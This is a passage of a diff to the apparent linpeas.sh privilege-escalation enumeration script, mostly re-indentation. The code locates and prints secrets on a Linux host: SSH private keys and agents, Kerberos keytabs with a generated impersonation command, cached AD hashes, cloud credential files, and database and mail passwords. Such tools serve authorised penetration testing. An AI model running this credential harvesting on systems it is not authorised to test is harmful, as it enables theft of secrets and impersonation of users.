the rules:" - printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," - echo "" - fi - if [ "$sshconfig" ]; then - echo "" - echo "Searching inside /etc/ssh/ssh_config for interesting info" - grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," - fi +if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then echo "" - - #-- SI) PAM auth - print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" - pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) - if [ "$pamssh" ]; then - grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi + print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi echo "" - - #-- SI) NFS exports - print_2title "NFS exports?" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" - if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," - else echo_not_found "/etc/exports" - fi +fi +if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" + printf "$certsb4_grep\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" +fi +if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" echo "" +fi +if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" +fi +if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then + print_3title "Listing SSH Agents" + ssh-add -l + echo "" +fi +if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" +fi +if [ "$hostsdenied" ]; then + print_3title "/etc/hosts.denied file found, read the rules:" + printf "$hostsdenied\n" + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + echo "" +fi +if [ "$hostsallow" ]; then + print_3title "/etc/hosts.allow file found, trying to read the rules:" + printf "$hostsallow\n" + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi +if [ "$sshconfig" ]; then + echo "" + echo "Searching inside /etc/ssh/ssh_config for interesting info" + grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," +fi +echo "" - #-- SI) Kerberos - print_2title "Searching kerberos conf files and tickets" - print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" - kadmin_exists="$(command -v kadmin)" - klist_exists="$(command -v klist)" - if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi - if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; - fi +#-- SI) PAM auth +print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" +pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) +if [ "$pamssh" ]; then + grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" - printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do - if [ -r "$f" ]; then - if echo "$f" | grep -q .k5login; then - echo ".k5login file (users with access to the user who has this file in his home)" - cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - elif echo "$f" | grep -q keytab; then - echo "" - echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" - klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do - if [ "$l" ] && echo "$l" | grep -q "@"; then - printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" - #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid - #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that - fi - done - elif echo "$f" | grep -q krb5.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; - elif echo "$f" | grep -q kadm5.acl; then - ls -l "$f" - cat "$f" 2>/dev/null - elif echo "$f" | grep -q sssd.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; - elif echo "$f" | grep -q secrets.ldb; then - echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - elif echo "$f" | grep -q .secrets.mkey; then - echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - fi +#-- SI) NFS exports +print_2title "NFS exports?" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" +if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," +else echo_not_found "/etc/exports" +fi +echo "" + +#-- SI) Kerberos +print_2title "Searching kerberos conf files and tickets" +print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" +kadmin_exists="$(command -v kadmin)" +klist_exists="$(command -v klist)" +if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi +if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; +fi + +printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do + if [ -r "$f" ]; then + if echo "$f" | grep -q .k5login; then + echo ".k5login file (users with access to the user who has this file in his home)" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + elif echo "$f" | grep -q keytab; then + echo "" + echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && echo "$l" | grep -q "@"; then + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" + #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + fi + done + elif echo "$f" | grep -q krb5.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; + elif echo "$f" | grep -q kadm5.acl; then + ls -l "$f" + cat "$f" 2>/dev/null + elif echo "$f" | grep -q sssd.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; + elif echo "$f" | grep -q secrets.ldb; then + echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + elif echo "$f" | grep -q .secrets.mkey; then + echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" fi - done - ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" - klist 2>/dev/null || echo_not_found "klist" - echo "" + fi +done +ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" +klist 2>/dev/null || echo_not_found "klist" +echo "" - print_2title "Analyzing Knockd Files (limit 70)" + print_2title "Analyzing Knockd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then echo_not_found "*knockd*"; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Kibana Files (limit 70)" + print_2title "Analyzing Kibana Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then echo_not_found "kibana.y*ml"; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Elasticsearch Files (limit 70)" + print_2title "Analyzing Elasticsearch Files (limit 70)" echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then echo_not_found "elasticsearch.y*ml"; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; - ##-- SI) Logstash - print_2title "Searching logstash files" - if [ "$PSTORAGE_LOGSTASH" ]; then - printf "$PSTORAGE_LOGSTASH\n" - printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do - if [ -r "$d/startup.options" ]; then - echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," - fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," - done - else echo_not_found - fi - echo "" +##-- SI) Logstash +print_2title "Searching logstash files" +if [ "$PSTORAGE_LOGSTASH" ]; then + printf "$PSTORAGE_LOGSTASH\n" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then + echo "Logstash is running as user:" + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," + fi + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," + done +else echo_not_found +fi +echo "" - #-- SI) Vault-ssh - print_2title "Searching Vault-ssh files" - if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then - printf "$PSTORAGE_VAULT_SSH_HELPER\n" - printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done - echo "" - vault secrets list 2>/dev/null - printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - else echo_not_found "vault-ssh-helper.hcl" - fi +#-- SI) Vault-ssh +print_2title "Searching Vault-ssh files" +if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" + vault secrets list 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null +else echo_not_found "vault-ssh-helper.hcl" +fi +echo "" - #-- SI) Cached AD Hashes - adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) - print_2title "Searching AD cached hashes" - if [ "$adhashes" ]; then - ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null - else echo_not_found "cached hashes" - fi - echo "" +#-- SI) Cached AD Hashes +adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) +print_2title "Searching AD cached hashes" +if [ "$adhashes" ]; then + ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null +else echo_not_found "cached hashes" +fi +echo "" - #-- SI) Screen sessions - print_2title "Searching screen sessions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - screensess=$(screen -ls 2>/dev/null) - if [ "$screensess" ]; then - printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," - else echo_not_found "screen" - fi - echo "" +#-- SI) Screen sessions +print_2title "Searching screen sessions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +screensess=$(screen -ls 2>/dev/null) +if [ "$screensess" ]; then + printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," +else echo_not_found "screen" +fi +echo "" - #-- SI) Tmux sessions - tmuxdefsess=$(tmux ls 2>/dev/null) - tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) - print_2title "Searching tmux sessions"$N - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," - else echo_not_found "tmux" - fi - echo "" +#-- SI) Tmux sessions +tmuxdefsess=$(tmux ls 2>/dev/null) +tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +print_2title "Searching tmux sessions"$N +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," +else echo_not_found "tmux" +fi +echo "" - print_2title "Analyzing CouchDB Files (limit 70)" + print_2title "Analyzing CouchDB Files (limit 70)" if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then echo_not_found "couchdb"; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; for ff in $(find "$f" -name "local.ini"); do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Redis Files (limit 70)" + print_2title "Analyzing Redis Files (limit 70)" if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then echo_not_found "redis.conf"; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; - #-- SI) Dovecot - # Needs testing - print_2title "Searching dovecot files" - dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) - if [ -z "$dovecotpass" ]; then - echo_not_found "dovecot credentials" - else - for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do - df=$(echo $d |cut -d ':' -f1) - dp=$(echo $d |cut -d ':' -f2-) - echo "Found possible PLAIN text creds in $df" - echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - done - fi - echo "" +#-- SI) Dovecot +# Needs testing +print_2title "Searching dovecot files" +dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) +if [ -z "$dovecotpass" ]; then + echo_not_found "dovecot credentials" +else + for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do + df=$(echo $d |cut -d ':' -f1) + dp=$(echo $d |cut -d ':' -f2-) + echo "Found possible PLAIN text creds in $df" + echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null + done +fi +echo "" - print_2title "Analyzing Mosquitto Files (limit 70)" + print_2title "Analyzing Mosquitto Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then echo_not_found "mosquitto.conf"; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Neo4j Files (limit 70)" + print_2title "Analyzing Neo4j Files (limit 70)" if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then echo_not_found "neo4j"; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; for ff in $(find "$f" -name "auth"); do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Cloud Credentials Files (limit 70)" + print_2title "Analyzing Cloud Credentials Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then echo_not_found "credentials"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then echo_not_found "credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then echo_not_found "legacy_credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; @@ -2824,112 +2786,112 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then echo_not_found ".bluemix"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; for ff in $(find "$f" -name "config.json"); do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Cloud Init Files (limit 70)" + print_2title "Analyzing Cloud Init Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then echo_not_found "cloud.cfg"; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; - print_2title "Analyzing CloudFlare Files (limit 70)" + print_2title "Analyzing CloudFlare Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then echo_not_found ".cloudflared"; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; - print_2title "Analyzing Erlang Files (limit 70)" + print_2title "Analyzing Erlang Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then echo_not_found ".erlang.cookie"; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing GMV Auth Files (limit 70)" + print_2title "Analyzing GMV Auth Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then echo_not_found "gvm-tools.conf"; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing IPSec Files (limit 70)" + print_2title "Analyzing IPSec Files (limit 70)" if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then echo_not_found "ipsec.secrets"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then echo_not_found "ipsec.conf"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing IRSSI Files (limit 70)" + print_2title "Analyzing IRSSI Files (limit 70)" if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then echo_not_found ".irssi"; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; for ff in $(find "$f" -name "config"); do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Keyring Files (limit 70)" + print_2title "Analyzing Keyring Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then echo_not_found "keyrings"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then echo_not_found "*.keyring"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then echo_not_found "*.keystore"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then echo_not_found "*.jks"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Filezilla Files (limit 70)" + print_2title "Analyzing Filezilla Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then echo_not_found "filezilla"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; for ff in $(find "$f" -name "sitemanager.xml"); do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E 